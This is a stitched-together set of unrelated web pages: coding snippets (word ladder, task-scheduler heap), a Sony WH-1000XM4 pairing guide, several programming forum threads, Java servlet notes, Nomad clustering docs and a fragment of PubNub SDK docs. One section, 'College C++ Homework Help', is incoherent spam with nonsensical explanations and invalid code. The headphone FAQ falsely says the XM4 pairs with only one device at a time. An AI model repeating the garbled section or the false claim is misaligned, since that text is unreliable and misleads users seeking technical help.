            if diff_count == 1:
                neighbors.append(neighbor)
        elif len(word) - len(neighbor) == 1:
            for i in range(len(word)):
                modified_word = word[:i] + word[i + 1:]
                if modified_word == neighbor:
                    neighbors.append(neighbor)
                    break
        elif len(neighbor) - len(word) == 1:
            for i in range(len(neighbor)):
                modified_word = neighbor[:i] + neighbor[i + 1:]
                if modified_word == word:
                    neighbors.append(neighbor)
                    break
    return neighbors

# Test case
start = 'dog'
end = 'seat'
dictionary = ['dot', 'cat', 'hot', 'hog', 'eat', 'dug', 'dig', 'hat']
result = isTransformable(start, end, dictionary)
print(result)

Follow-up Question #2

How would you modify this to be an API to handle a large amount of dictionary words but only a few checks for transforming?

To handle a large amount of dictionary words but only a few checks for transforming, we can design an API that preprocesses the dictionary and stores it in an efficient data structure, such as a trie or a hash table. This preprocessing step ensures quick access to the dictionary words during the transformation checks.

For pre-processing we can:
1. Create a data structure, such as a trie or a hash table, to store the dictionary words.
2. Iterate through each word in the dictionary and add it to the data structure for efficient lookup.

We then expose an API function, let's say isTransformable, that takes the start word, end word, and the preprocessed data structure as input. Inside the isTransformable function, we can perform the transformation check using the existing logic from our previous solution. We then utilize the preprocessed data structure to quickly access dictionary words and check for neighbors during the transformation process. (A sketch of this design follows after the complexity analysis below.)

Time/Space Complexity Analysis

• Time Complexity: O(m * n), where m is the average length of the words and n is the number of words in the dictionary.
• Space Complexity: O(m * n), where m is the average length of the words and n is the number of words in the dictionary.
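To make Follow-up #2 concrete, here is a minimal sketch of the preprocessing-based API described above. The class name and the choice of a hash-based index are illustrative assumptions, not part of the original prompt; the lookup structure simply buckets dictionary words by length so that neighbor generation only scans plausible candidates, and the per-check BFS reuses that index.

from collections import defaultdict, deque

class TransformationService:
    def __init__(self, dictionary):
        # One-time preprocessing: bucket words by length for fast candidate lookup.
        self.by_length = defaultdict(list)
        for word in dictionary:
            self.by_length[len(word)].append(word)

    def _neighbors(self, word):
        # Same-length, one-substitution neighbors only (the Follow-up #1 cases
        # could be added by also scanning the len(word) +/- 1 buckets).
        for cand in self.by_length[len(word)]:
            if sum(a != b for a, b in zip(word, cand)) == 1:
                yield cand

    def is_transformable(self, start, end):
        if start == end:
            return True
        visited = {start}
        queue = deque([start])
        while queue:
            word = queue.popleft()
            # The end word may not be in the dictionary, so test it directly.
            if len(word) == len(end) and sum(a != b for a, b in zip(word, end)) == 1:
                return True
            for nxt in self._neighbors(word):
                if nxt not in visited:
                    visited.add(nxt)
                    queue.append(nxt)
        return False

service = TransformationService(['dot', 'cat', 'hot', 'hog', 'eat', 'dug', 'dig'])
print(service.is_transformable('dog', 'hat'))  # True: dog -> hog -> hot -> hat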
How to Connect Sony WH-1000XM4 to PC? How to Connect Sony WH-1000XM4 to PC? Are you the proud owner of the Sony WH-1000XM4 headphones and looking to connect them to your PC? Look no further! In this article, we will guide you through the step-by-step process of connecting your Sony WH-1000XM4 headphones to your PC. Whether you want to enjoy immersive audio while watching movies or listening to music, connecting your headphones to your PC can enhance your overall audio experience. Let’s get started! Step 1: Check PC Compatibility Before connecting your Sony WH-1000XM4 headphones to your PC, ensure that your PC has built-in Bluetooth connectivity or a Bluetooth adapter. Most modern PCs come with Bluetooth, but if yours doesn’t, you can easily purchase a Bluetooth dongle and connect it to your PC’s USB port. Step 2: Turn on Bluetooth on Your PC To establish a connection between your PC and the Sony WH-1000XM4 headphones, you need to enable Bluetooth on your computer. Here’s how you can do it: 1. Go to the “Settings” menu on your PC. 2. Look for the “Bluetooth & other devices” option and click on it. 3. Toggle the Bluetooth switch to turn it on. Step 3: Set the Sony WH-1000XM4 Headphones to Pairing Mode To connect the headphones to your PC, you need to put them into pairing mode. Follow these steps: 1. Power on the Sony WH-1000XM4 headphones. 2. Locate the “Power” button on the headphones and press and hold it for a few seconds until you hear a voice prompt saying, “Bluetooth pairing.” Step 4: Pairing the Headphones with Your PC Once the headphones are in pairing mode, you can proceed to pair them with your PC. Here’s how: 1. On your PC, go to the “Settings” menu and select “Bluetooth & other devices.” 2. Click on the “Add Bluetooth or other devices” option. 3. Choose the “Bluetooth” option. 4. Your PC will start scanning for nearby Bluetooth devices. 5. When you see “WH-1000XM4” or a similar name in the list of available devices, click on it to initiate the pairing process. 6. Follow any additional on-screen prompts to complete the pairing. Step 5: Test the Connection After successfully pairing your Sony WH-1000XM4 headphones with your PC, it’s time to test the connection. Play some audio or video on your PC, and the sound should now come through your headphones. Adjust the volume on both your PC and the headphones to your preferred levels. Troubleshooting Tips If you encounter any issues during the connection process, here are a few troubleshooting tips: 1. Make sure the headphones are sufficiently charged. 2. Restart both your PC and the headphones. 3. Double-check that Bluetooth is enabled on your PC. 4. Move your headphones and PC closer together to ensure a strong Bluetooth signal. 5. Update the Bluetooth drivers on your PC. Conclusion Connecting your Sony WH-1000XM4 headphones to your PC is a straightforward process that allows you to enjoy high-quality audio and a personalized listening experience. By following the steps outlined in this article, you can easily connect your headphones and immerse yourself in a world of sound. Frequently Asked Questions Can I connect the Sony WH-1000XM4 headphones to multiple devices simultaneously? No, the Sony WH-1000XM4 headphones can only connect to one device at a time. You will need to disconnect them from one device before connecting them to another. Can I use the Sony WH-1000XM4 headphones with a Mac computer? Yes, the Sony WH-1000XM4 headphones are compatible with Mac computers. 
The pairing process is similar to the one described in this article. How do I update the firmware on my Sony WH-1000XM4 headphones? To update the firmware on your Sony WH-1000XM4 headphones, you can download the Sony | Headphones Connect app on your smartphone and follow the instructions provided in the app. Can I use the Sony WH-1000XM4 headphones for gaming on my PC? Yes, you can use the Sony WH-1000XM4 headphones for gaming on your PC. However, they are primarily designed for music and multimedia consumption rather than gaming. How do I adjust the noise cancellation settings on the Sony WH-1000XM4 headphones? You can adjust the noise cancellation settings on your Sony WH-1000XM4 headphones by using the Sony | Headphones Connect app. The app allows you to customize the level of noise cancellation according to your preferences. Sufyan Mughal Sufyan Mughal, is a Tech and Gaming nerd. He developed his passion during the college days and is now working passionately to make his dreams come true. He mostly likes Gaming but is also a master of Tech. His knowledge has served many people around him. He mostly likes to be alone to gain as much knowledge as he can which makes him a true master of Tech World.
iPod Classic Repair
Model A1238 / 80, 120, or 160 GB hard drive / black or silver metal front

Why won't my computer recognize my iPod Classic?

I cannot download anything to my iPod because my computer will not recognize it. I have troubleshot it, and it says that something is not working right on the iPod.

Comments:
mayer: Would you tell us exactly what it says "is not working"?
oldturkey03: candydus77, did you get it fixed or is it still a problem?

Chosen Solution

Your computer will not recognize your iPod Classic without iTunes loaded on your computer. It sounds like your computer is missing the necessary drivers to understand how to deal with it. Those come with iTunes. If you have iTunes installed on your computer and you are getting error messages, try changing the USB port you are using. If that doesn't work, you may have a faulty cord and need a new one.

Comment:
oldturkey03: Nice answer, but not quite correct. You do not have to use iTunes, and depending on your OS it will still recognize an iPod as a USB drive, especially the HDD iPods. Your suggestions are a good start to check, but far from definitive.
Help!! variable at 0 or not?

clalav:
the if:

   if (cnt == total - 1 && lotti_tot != 0 && total > 1)
      { Print("lotti sbilanciati ", lotti_tot); }

result: lotti sbilanciati 0

what happens?

whroeder1:
1. Don't paste code. Play video. Please edit your post. For large amounts of code, attach it.
2. lotti_tot was in the range [0.0000000000000001 - 0.00004999999999] (not exactly zero), but Print defaults to 4 digits. See The == operand. - MQL4 forum

JD4:
Really? You're going to be that anal about a couple lines of code?

whroeder1:
1. The question was: variable at 0 or not? If variable != 0, Print(variable), and 0 got printed. I answered the OP's why.
2. You're now in the category of troll: insulting and not helpful, arrogant, unhelpful, missed the point, argumentative, again and not helpful, after issue resolved, "if(v=0){...} else {...}" is unhelpful, style differences vs the topic, and are now being ignored.

Keith Watford (Moderator):
Judging from the amount of times that similar queries are posted here, I would imagine that comparing doubles is probably the most difficult thing for new coders to understand. WHRoeder has answered the same question hundreds of times already, but instead of thinking "Oh no, not again! How many more times can this same question be posted?", he offers a brief explanation and supplies a link for people to read and learn. That is being helpful, not anal. If you think that 0.0000000000000001 == 0, then you are going to have problems with coding mq4. WHRoeder helps a lot of people with his posts, unlike the flurry of recent posts from you that don't add anything to the thread and don't help anybody.

Alain Verleyen (Moderator):
The topic is closed.
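An editorial aside to make the thread's point concrete: the snippet below (Python rather than MQL4, purely for illustration) shows how a value can print as 0 while still failing a != 0 test, and the usual tolerance-based comparison that avoids the trap.

x = 0.1 + 0.2 - 0.3          # mathematically zero, but not in binary floating point
print(x)                     # 5.551115123125783e-17
print("%.4f" % x)            # 0.0000 -- looks like zero at 4 printed digits
print(x != 0)                # True  -- the comparison still sees a nonzero value

EPS = 1e-8                   # tolerance chosen to match the problem's scale
def is_zero(value, eps=EPS):
    # Compare against a tolerance instead of testing exact equality with 0.
    return abs(value) < eps

print(is_zero(x))            # True

The same idea applies in MQL4: compare lot sizes (or any computed double) against a small epsilon appropriate to the instrument's lot step, not against literal zero.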
College C++ Homework Help Buddy I’ve come a long way since opening my freshman year of high school. Until I moved into that dorm (which at least goes without the language barrier), I switched to visit this page as my favorite programming language. I’ve managed to cram every single piece of code into a perfect draft to add some structure that would make sense for us to build up. Heck, I could use the original C++ to do the same myself. I can imagine myself putting an RLE program in a C++ program, executing that, and then having to build up the code, just running the program at the top of each loop. Or it could be something like a loop that goes up, down, straight and back to the previous position, but runs at the bottom and has to finish something when first there is not going to be anything (there are not too few new tasks to do at the top of each loop/reset) I know I must, but keep in mind the above diagram, I want to have a long story of what I’m going to build out before going to a C++ classroom. Once I have started writing, I want to be a bit more independent. And I know the ideas are mine. Being independent? This is an awesome idea! Get a C++ calculator and go to assembly… A program that would be a really good starting point for building up things. Perhaps using the RLE I could add a few functions like the first one to my mainprogram while this is developing and I would also have more control on how to program, one would probably have something like a bit. Replace the RLE program with something somewhere that requires my creativity. I’m just thinking of those kinds of things in a class that have very generic programming. If my world is no longer a series of these things then why don’t I have the RLE? Does code have to be built and run I’d be better off building things directly in C++? Or I could keep the language barrier? I know I would want to have as much space in my classes, how many things could I use to build up stuff between my classroom and some of the later post work I have done. I am very likely going to gain a clean.h,.procs, and.java/.dto files in 2 to 3 months. Of course, I plan to go get a computer someday instead. Am sorry i have to go into the entire class stuff I am learning together this weekend. Copy Assignment Operator C++ The only possible reason i can think of is my parents. Yeah, I know its all about them, and they deserve to feel so bad. But i keep on learning the language i have and working hard at it, making learning my own best best friend into something i want to accomplish when i get it. I am so glad if i can accomplish this kind of thing on my own 😕College C++ Homework Help The article does reflect “computing-related” elements. Below are all values that you would most likely want to edit so that most of the code is clearly written in C. Sample data: MethodData: ConcurrentExecutionMode: Masks: 0 Ecs: 2 Dependencies: 0 Elements: 0 Conclusion: You might wish to modify the above line (on the methodData), modify the code that makes the data table, and the methodData changes to reflect the improvements made to C++ code. Doing so is more important than the original code style. 
MethodData / MethodData for Comparative Programming Multiply a collection of values and form a collection of numbers; Convert a value into a numeric value as a function and only write to the function data In C, the sum will remain in the form of a string, if both values are numeric and are a function of the form: integer() -> number However, by convention, if both values are numeric and the sum is in numeric format, the function returned will result in a float: float(i) -> number; Also, in modern C++, you cannot read the value inside the numeric part of an operation; you must get a data type to write to the function data, and thus must write a function to read the value. How To Implement MethodData/MethodData MethodData/MethodData is likely the most standard approach used in the design of the method data structure in C/C++. Because it is not yet standardized, the actual implementation is unknown; it is implemented purely in C. However, because that fact is a minor question, it should be the first step of a standard implementation. The main point of the method data structure is the method method that generates the object. This way, you can expect to obtain all the operations that are going to be performed by the method object so that you’ll be able to make sure that any computations you perform cannot exceed your threshold, or are never performed. Additionally, the function return values are all created in the correct order and as you can see from the summary on methodData, you can easily see that the operations as they were written are all working correctly. MethodData/MethodData in C++ is not only easier to produce, it gives you the idea of how to write the calls to the memory manager and process. However, it doesn’t contain all the desired information. For example, it uses the method method data, not the method data itself. Also, the use of methods in C++ is slightly crazy (except for the example showing you are able to access the MethodData with code call MethodData and the method methods can be accessed from the main() method) and you do not want to modify the file structure (when the structure is actually written in Ccpp, you can just copy it to c++ file). This is an example of a situation when you want to change a method by defining it yourself. This book will still provide you with all the information for you, but A complete specification can be found here and here. Compound Assignment Operators Python Some simple code examples: int getInv(int? n) { return n; } TestClass: getInv(int? n) { n = n + 1; return n * n; } A simple and readable example showing what calls do in methods: getInv(int? n) { if (n!= 0 && n % 2 == 0) { return (-1) * (n / 2); } } Test class: getInv(int? n) { m = (m + n / 2); return m * m; } We can actually see that when we initialize the method itself, no need for any calls to invoke the instance method again (and just in case later we’re able to read some data from the method). You can see the list of the method names, the methods that have access to the instance method, the instance methods with access to the function and return values, example.cc code itself. 
Later we will see how to call the name or methods used by the method classes, such as: getInv(College C++ Homework Help: Creating Fits, Handling Data In the last 10 years, the number of complete exercises for FIFOs have never dramatically increased; there have been 3,000 new, add/edit, and delete cases where we have encountered the problem of data accesses completely missed in the software of many previous products, in the recent ICS’s years. In the last 5 years, we experienced over a million daily user experiences, one for each FIFO’s customer (C++/AS too; I’m responsible for the exact meaning of the different). The service level has increased dramatically, several items have been copied/modulated, and many other tasks have been handled in the most perfect and simplest manner possible; most often taking several days to complete each of the tasks. In this blog post, we will provide a quick and simple task-specific guide around where to look at the FIFO (File, Data, IO Mismatch) to solve this problem. Prerequisites to see post Creating Fits The most important factor is the architecture (PHP + JS) in the original FIFO To create a FIFO, you shall operate on a user-visible object, and then work with it. The ‘original‘ should be used for each data access operation (user-visible) for each FIFO (and maybe many FIFOs themselves); it should be the basis of each code you will build. You can easily find the context of the application in the standard section of the application help of the PHP codehelp article for more information about this, but the installation of an existing FIFO will be necessary if you already used a different approach that you are using for the FIFO’s functionality: #include #include #include int main(int argc, char ** argv) { int i; bool hasamax = true; ilist = new ilist_node(argc, argv); ilist->imgproc_state_c.attach(imgproc_state_c); ilist->imgproc_state = set_instance_of_buffer(imgproc_state); ilist->new_state = set_new_instance(); ilist->new_state_b = 0; ilist->new_name_c = app_names[0]; ilist->font_state_c.attach(imgproc_state); ilist->jpg_state = 0; ilist->png_state = 0; ilist->write = 1; ilist->write_c = 1; ilist->rm_state = 0; ilist->remove_state = 0; ilist->set_new_state = 1; ilist->set_filename_c = new filer_c[0]; ilist->png_file_c = 0; ilist->png_file = 0; ilist->width_c = 16; ilist->output = 1; ilist->output_index_c = 0; ilist->color_c = 0; ilist->overflow_c = 0; ilist->overflow_data_c = 0; ilist->overflow_data = 0; ilist->cput_c = 0; ilist->list_c = 0; ilist->list_width_c = 15; ilist->list_height_c = 5; ilist->list_depth_c = 5; ilist->list_size_c = 5; ilist->list_diff1_c = 1; ilist->list_diff1_max_c = 1; ilist->list_diff1_dist = 15; ilist->list_diff2_c = 1; ilist->list_diff2_max_c = 5; ilist->list_diff2_dist = 5; ilist->list_diff2_dist = 4; ilist->list_diff2_init = 1; ilist->new_state_c = 0; ilist->show_finesc_c = 1; Share This
Subject: linux headers and tcpdump programs

I'm trying to port tcpdump 3.2.1a1 to Linux. The major problem is that the elements of structures are called something else than in the tcpdump/BSD implementation... I think the way things are managed in header files is somewhat backwards...

For example, <net/udp.h> does:

#include <linux/udp.h>

#define UDP_NO_CHECK 0

extern struct proto udp_prot;

extern void udp_err(int type, int code, unsigned char *header, __u32 daddr,
                    __u32 saddr, struct inet_protocol *protocol);
extern void udp_send_check(struct udphdr *uh, __u32 saddr, __u32 daddr,
                           int len, struct sock *sk);
extern int udp_recvfrom(struct sock *sk, unsigned char *to, int len,
                        int noblock, unsigned flags, struct sockaddr_in *sin,
                        int *addr_len);
extern int udp_read(struct sock *sk, unsigned char *buff, int len,
                    int noblock, unsigned flags);
extern int udp_connect(struct sock *sk, struct sockaddr_in *usin,
                       int addr_len);

and linux/udp.h:

#ifndef _LINUX_UDP_H
#define _LINUX_UDP_H

struct udphdr {
    unsigned short source;
    unsigned short dest;
    unsigned short len;
    unsigned short check;
};

The BSD udphdr structure is:

#ifndef _NETINET_UDP_H_
#define _NETINET_UDP_H_

/*
 * Udp protocol header.
 * Per RFC 768, September, 1981.
 */
struct udphdr {
    u_short uh_sport;   /* source port */
    u_short uh_dport;   /* destination port */
    short   uh_ulen;    /* udp length */
    u_short uh_sum;     /* udp checksum */
};
#endif

I would imagine net/udp.h to have something like:

#ifdef BSD_COMPAT
struct udphdr {
    unsigned short uh_sport;
    unsigned short uh_dport;
    unsigned short uh_ulen;
    unsigned short uh_sum;
};
#else
struct udphdr {
    unsigned short source;
    unsigned short dest;
    unsigned short len;
    unsigned short check;
};
#endif

#ifdef __KERNEL__
#include <linux/udp.h>
#endif

where linux/*.h contains Linux/kernel dependencies... udphdr is pretty generic UDP stuff (so I don't see why it's in linux/udp.h instead of net/udp.h).

I want to see tools like tcpdump compile relatively cleanly. Comments? If this is a step in the right direction, I'll start making the changes.

marty
[email protected]
Member of the League for Programming Freedom (http://www.lpf.org)
Any sufficiently advanced technology is indistinguishable from magic
Arthur C. Clarke, The Lost Worlds of 2001
End schedule after Queue is empty

#1 Hello, I would like to know if it is possible to end a schedule in Orchestrator after a queue is empty. At the moment, my schedule continues to run and gives error messages because it cannot find any items in the queue. Does someone have experience with this? Thanks! Robbert

#2 Hi Robbert, please check this post: You can express your opinion there or on this post regarding schedules:

#3 So if I understand correctly, it is not possible to command the robot to stop if a queue is empty?

#4 You can within your workflow: add a condition after Get Transaction Item that checks whether trItem Is Nothing. If it's false, continue with the item processing; if it's true, use a Log Message activity ("No more items to process") and let the process end.

#5 Thanks!
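To summarize the pattern suggested in post #4 above as pseudocode (written Python-style purely for illustration; UiPath workflows are built from activities, and the helper functions named here are hypothetical, not UiPath API calls): the process loops on Get Transaction Item and exits cleanly when the queue hands back nothing.

# Illustrative pseudocode of the suggested workflow shape, not real UiPath calls.
while True:
    tr_item = get_transaction_item(queue="MyQueue")  # hypothetical helper
    if tr_item is None:                              # the "trItem Is Nothing" check
        log("No more items to process")
        break                                        # end gracefully instead of erroring
    process(tr_item)                                 # normal item handling
    set_transaction_status(tr_item, "Successful")    # hypothetical helper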
[Java Tutorial] Java Study Notes - HttpServletResponse and HttpServletRequest (14)

If a developer needs to obtain the user's request, they should use an object of the HttpServletRequest interface. If a developer needs to respond to the user's request, they should use an object of the HttpServletResponse interface.

The HttpServletResponse interface

This interface extends the ServletResponse interface. Its main tasks are handling response header information, sending the response body data for the client's request, and transferring Cookie data.

Commonly used methods of the ServletResponse interface

The core methods write data out through the response object:

ServletOutputStream getOutputStream()  -- obtain the response's byte output stream
PrintWriter getWriter()  -- obtain the response's character stream object
setContentType(String type)  -- specify the content type of the response data
setCharacterEncoding(String charset)  -- specify the encoding of the response data

Commonly used methods of the HttpServletResponse interface

Set the response status code and response headers:
setStatus(int sc)
setHeader(String name, String value)

Redirect a request:
sendRedirect(String location)

Transfer Cookie data:
void addCookie(Cookie cookie)

Implement sessions using the URL rewriting technique:
String encodeURL(String url)
String encodeRedirectURL(String url)

Controlling the response status code and headers

public void doGet(HttpServletRequest request, HttpServletResponse response)
        throws ServletException, IOException {
    // Set the response status code
    response.setStatus(302); // the resource has moved temporarily
    // Set a response header pointing at the resource's current address
    response.setHeader("location", "/day06/index.jsp");
}

Problem: someone who does not know the HTTP protocol could not write the code above. It can be replaced with the following statement:

response.sendRedirect("/day06/index.jsp");

Using a byte stream for the response body

public void doGet(HttpServletRequest request, HttpServletResponse response)
        throws ServletException, IOException {
    // Tell the browser to decode the response as UTF-8
    response.setHeader("content-type", "text/html;charset=utf-8");
    // Obtain the byte output stream
    ServletOutputStream out = response.getOutputStream();
    // Define the data to output
    String data = "hello<br/>";
    // Output the data
    out.write(data.getBytes());
    data = "<font color=\"blue\">this is a blue color!</font><br/>";
    out.write(data.getBytes());
    // Output Chinese text
    data = "中国";
    // Write the UTF-8 encoding of the Chinese text
    out.write(data.getBytes("UTF-8")); // UTF-8
}

The protocol-level statement in the code above can be simplified with:

response.setContentType("text/html;charset=utf-8");

It can also be simplified by emulating the HTTP header with a meta tag:

out.write("<meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\">".getBytes());

What happens if you output a number directly with the byte stream?

// output int data
int num = 65;
out.write(num);

Because the browser is a text-oriented program, it converts the number to the corresponding character when parsing, so the code above displays A. To output 65 literally, use out.write("65".getBytes());

Using a byte stream to output an image

public void doGet(HttpServletRequest request, HttpServletResponse response)
        throws ServletException, IOException {
    // Obtain the web application object
    ServletContext context = this.getServletContext();
    // Obtain the path of the resource on disk
    String path = context.getRealPath("/imgs/美女.jpg");
    File file = new File(path);
    System.out.println(file);
    // Set a response header telling the browser how to handle the data
    response.setHeader("content-disposition",
            "attachment;filename=" + URLEncoder.encode(file.getName(), "utf-8")); // avoid a garbled filename
    // Open a byte input stream on the file
    FileInputStream in = new FileInputStream(file);
    // Obtain the byte output stream
    ServletOutputStream out = response.getOutputStream();
    // Read and write in chunks
    byte[] b = new byte[1024];
    int len = 0;
    while ((len = in.read(b)) != -1) {
        out.write(b, 0, len);
    }
    // Release resources
    in.close();
}

If a site contains both images and text, which stream should be used? A Response object cannot provide both a byte stream and a character stream at the same time; this question comes from not fully understanding how HTTP communication works. The browser's request always fetches a page, but an image on the page is not represented as an inline byte stream: the page simply contains <img src="url"/>, which is sent to the browser as text. The browser then follows the src path and issues further requests, fetching each image as a byte stream.
Manual Clustering

Manually bootstrapping a Nomad cluster does not rely on additional tooling, but does require operator participation in the cluster formation process. When bootstrapping, Nomad servers and clients must be started and informed with the address of at least one Nomad server. As you can tell, this creates a chicken-and-egg problem where one server must first be fully bootstrapped and configured before the remaining servers and clients can join the cluster. This requirement can add additional provisioning time as well as ordered dependencies during provisioning.

First, we bootstrap a single Nomad server and capture its IP address. After we have that node's IP address, we place this address in the configuration. For Nomad servers, this configuration may look something like this:

server {
  enabled          = true
  bootstrap_expect = 3

  # This is the IP address of the first server we provisioned
  server_join {
    retry_join = ["<known-address>:4648"]
  }
}

Alternatively, the address can be supplied after the servers have all been started by running the server join command on the servers individually to cluster the servers. All servers can join just one other server, and then rely on the gossip protocol to discover the rest.

$ nomad server join <known-address>

For Nomad clients, the configuration may look something like:

client {
  enabled = true
  servers = ["<known-address>:4647"]
}

The client node's server list can be updated at run time using the node config command.

$ nomad node config -update-servers <IP>:4647

The port corresponds to the RPC port. If no port is specified with the IP address, the default RPC port of 4647 is assumed. As servers are added or removed from the cluster, this information is pushed to the client. This means only one server must be specified because, after initial contact, the full set of servers in the client's region is shared with the client.
Thread: Xtree - '_Debug_Message'?

#1 Registered User, Jul 2007

Question: Xtree - '_Debug_Message'?

I'm a student just learning C++ after a couple years of working with Java, so I'm an intermediate programmer, I'd say. I'm doing some homework in which I need to create a child class of the data container 'set', and I'm using Microsoft Visual C++ Studio 2005 to do it. I was doing fine until right up at the end: I made a small change in how an iterator was being incremented in the Union method, and then my program would no longer compile. I undid the change and tried to recompile, but I got the same error. Upon looking closer at the error message, I see it doesn't even relate to my source, but to "xtree", which I can only assume is the internal symbol linker(?). Can someone help me walk through correcting the error? I'd greatly appreciate the help, and can post the source on request. Here's the error message in its entirety; my source file is MySet.cpp:

Code:
------ Build started: Project: MySet, Configuration: Debug Win32 ------
Compiling...
MySet.cpp
c:\program files\microsoft\visual studio 8\vc\include\xtree(245) : error C2146: syntax error : missing ';' before identifier '_Debug_message'
c:\program files\microsoft\visual studio 8\vc\include\xtree(239) : while compiling class template member function 'const int &std::_Tree<_Traits>::const_iterator::operator *(void) const'
        with [ _Traits=std::_Tset_traits<int,std::less<int>,std::allocator<int>,false> ]
c:\program files\microsoft\visual studio 8\vc\include\xtree(413) : see reference to class template instantiation 'std::_Tree<_Traits>::const_iterator' being compiled
        with [ _Traits=std::_Tset_traits<int,std::less<int>,std::allocator<int>,false> ]
c:\program files\microsoft\visual studio 8\vc\include\xtree(533) : see reference to class template instantiation 'std::_Tree<_Traits>::iterator' being compiled
        with [ _Traits=std::_Tset_traits<int,std::less<int>,std::allocator<int>,false> ]
c:\program files\microsoft\visual studio 8\vc\include\xtree(530) : while compiling class template member function 'std::_Tree<_Traits> &std::_Tree<_Traits>::operator =(const std::_Tree<_Traits> &)'
        with [ _Traits=std::_Tset_traits<int,std::less<int>,std::allocator<int>,false> ]
c:\program files\microsoft\visual studio 8\vc\include\set(69) : see reference to class template instantiation 'std::_Tree<_Traits>' being compiled
        with [ _Traits=std::_Tset_traits<int,std::less<int>,std::allocator<int>,false> ]
c:\documents and settings\jared\my documents\visual studio 2005\projects\myset\myset\myset.cpp(33) : see reference to class template instantiation 'std::set<_Kty>' being compiled
        with [ _Kty=int ]
c:\documents and settings\jared\my documents\visual studio 2005\projects\myset\myset\myset.cpp(249) : see reference to class template instantiation 'MySet<Type>' being compiled
        with [ Type=int ]
Build log was saved at "file://c:\Documents and Settings\Jared\My Documents\Visual Studio 2005\Projects\MySet\MySet\Debug\BuildLog.htm"
MySet - 1 error(s), 0 warning(s)
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========

#2 Registered User, Jul 2007

Bleh, never mind. Apparently, when I made my iterator change, the IDE automatically opened the xtree file to show me at what point in the file it encountered the error, and I must have entered a stray character into it before closing it.
After opening it up and going to the line referenced in the error, I found an errant '5', which I deleted. Afterwards it worked just fine... sorry for the disturbance.

3. #3 Cat without Hat CornedBee's Avatar Join Date Apr 2003 Posts 8,895

1) The Windows board is for programming problems that are specific to the Win32 API, or one of its wrappers. Please post questions such as these in the general C++ board. If they are about compiler configuration, please post them in Tech.
2) You have homework that asks you to derive from std::set?

All the buzzt! CornedBee

"There is not now, nor has there ever been, nor will there ever be, any programming language in which it is the least bit difficult to write bad code." - Flon's Law
function getOrder(tasks: number[][]): number[] {
    let currentTime = 0;
    // Keep each task's original index, then sort by enqueue time.
    tasks = tasks.map((task, i) => [...task, i]).sort((a, b) => a[0] - b[0]);
    const tasksHeap = new TasksHeap([]);
    const orderedTasks: number[] = [];
    let index = 0;
    while (index < tasks.length || tasksHeap.size()) {
        // If the CPU is idle, jump ahead to the next task's enqueue time.
        if (!tasksHeap.size() && currentTime < tasks[index][0]) {
            currentTime = tasks[index][0];
        }
        // Push every task that has become available by now.
        while (index < tasks.length && tasks[index][0] <= currentTime) {
            tasksHeap.insert(tasks[index]);
            index++;
        }
        // Run the shortest available task (ties broken by original index).
        const item = tasksHeap.popMin();
        currentTime += item[1];
        orderedTasks.push(item[2]);
    }
    return orderedTasks;
}

class TasksHeap {
    private readonly data: number[][];

    constructor(data: number[][]) {
        this.data = data;
    }

    swap(i: number, j: number) {
        const temp = this.data[i];
        this.data[i] = this.data[j];
        this.data[j] = temp;
    }

    // Sift down: order by processing time (index 1), break ties by task index (index 2).
    heapify(i: number) {
        const leftNode = 2 * i + 1;
        const rightNode = 2 * i + 2;
        let minimalNode;
        if (leftNode <= this.data.length - 1 &&
            (this.data[leftNode][1] < this.data[i][1] ||
             this.data[leftNode][1] === this.data[i][1] && this.data[leftNode][2] < this.data[i][2])) {
            minimalNode = leftNode;
        } else {
            minimalNode = i;
        }
        if (rightNode <= this.data.length - 1 &&
            (this.data[rightNode][1] < this.data[minimalNode][1] ||
             this.data[rightNode][1] === this.data[minimalNode][1] && this.data[rightNode][2] < this.data[minimalNode][2])) {
            minimalNode = rightNode;
        }
        if (minimalNode !== i) {
            this.swap(i, minimalNode);
            this.heapify(minimalNode);
        }
    }

    // Sift up after an insert, using the same (time, index) ordering.
    heapifyUp(i: number) {
        const parentIndex = Math.floor((i - 1) / 2);
        if (parentIndex >= 0 &&
            (this.data[parentIndex][1] > this.data[i][1] ||
             this.data[parentIndex][1] === this.data[i][1] && this.data[parentIndex][2] > this.data[i][2])) {
            this.swap(parentIndex, i);
            this.heapifyUp(parentIndex);
        }
    }

    size(): number {
        return this.data.length;
    }

    popMin(): number[] {
        const min = this.data[0];
        this.swap(0, this.data.length - 1);
        this.data.pop();
        this.heapify(0);
        return min;
    }

    insert(item: number[]) {
        this.data.push(item);
        this.heapifyUp(this.data.length - 1);
    }

    getHeap() {
        return this.data;
    }
}
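This is the standard simulation for a "single-threaded CPU" style scheduling problem; the hand-rolled heap above exists only because the snippet avoids external libraries. For comparison, here is a minimal sketch of the same scheduling logic in Python, where the standard library's heapq handles the (processing time, index) ordering through ordinary tuple comparison:

import heapq

def get_order(tasks):
    # Sort by enqueue time, remembering each task's original index.
    order = sorted((enq, dur, i) for i, (enq, dur) in enumerate(tasks))
    heap, result, time, idx = [], [], 0, 0
    while idx < len(order) or heap:
        if not heap and time < order[idx][0]:
            time = order[idx][0]            # CPU is idle: jump forward
        while idx < len(order) and order[idx][0] <= time:
            enq, dur, i = order[idx]
            heapq.heappush(heap, (dur, i))  # tuple order = (duration, index)
            idx += 1
        dur, i = heapq.heappop(heap)
        time += dur
        result.append(i)
    return result

# e.g. get_order([[1, 2], [2, 4], [3, 2], [4, 1]]) -> [0, 2, 3, 1]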
C# V4 SDK 4.2.0.0

These docs are for PubNub 4.0 for C#, which is our latest and greatest! For the docs of the 3.x versions of the SDK, please check the links: C#, Windows 8, Windows 8.1, ASP.Net, Windows Phone 8, Windows Phone 8.1, Xamarin.iOS, Xamarin.Android, Xamarin.Mac and C# PCL. If you have questions about the PubNub for C# SDK, please contact us at [email protected].

Supported platforms: .Net 3.5/4.0/4.5/4.61; Xamarin.Android, Xamarin.iOS and .Net Core/.Net Standard; Universal Windows. View Supported Platforms.

using PubnubApi;

PNConfiguration pnConfiguration = new PNConfiguration();
pnConfiguration.SubscribeKey = "my_subkey";
pnConfiguration.PublishKey = "my_pubkey";
pnConfiguration.SecretKey = "my_secretkey";
pnConfiguration.LogVerbosity = PNLogVerbosity.BODY;
pnConfiguration.Uuid = "PubNubCSharpExample";

Dictionary<string, string> message = new Dictionary<string, string>();
message.Add("msg", "hello");

Pubnub pubnub = new Pubnub(pnConfiguration);

SubscribeCallbackExt subscribeCallback = new SubscribeCallbackExt(
    (pubnubObj, messageResult) => {
        if (messageResult != null) {
            Debug.WriteLine("In Example, SubscribeCallback received PNMessageResult");
